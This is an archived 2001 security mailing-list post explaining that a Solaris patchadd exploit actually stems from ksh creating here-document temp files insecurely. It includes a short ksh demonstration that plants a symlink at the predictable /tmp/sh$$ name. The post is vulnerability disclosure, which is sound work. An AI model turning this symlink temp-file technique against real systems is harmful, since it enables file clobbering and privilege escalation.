> Here is an exploit to an old bug for patchadd in Solaris. ... > #See BID http://www.securityfocus.com/bid/2127 The bug is not in the patchadd script, but in the Korn shell ksh that creates "here documents" insecurely. Demonstration (ksh is vulnerable if the size of silly.1 is changed): #!/bin/ksh -x touch /tmp/silly.1 ln -s /tmp/silly.1 /tmp/sh$$.1 ls -l /tmp/silly.* /tmp/sh$$.* cat <<EOF Just some short text EOF ls -l /tmp/silly.* /tmp/sh$$.* rm /tmp/silly.* /tmp/sh$$.* Note that there is a similar bug in the Bourne shell sh. For a historical perspective see articles: 200011230225.NAA19716at_private">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716at_private 200012190800.TAA05385at_private">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385at_private 200012202213.JAA03182at_private">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182at_private 200012202211.JAA25620at_private">http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620at_private Cheers, Paul Szabo - pszat_private http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia
This archive was generated by hypermail 2b30 : Mon Aug 27 2001 - 14:30:33 PDT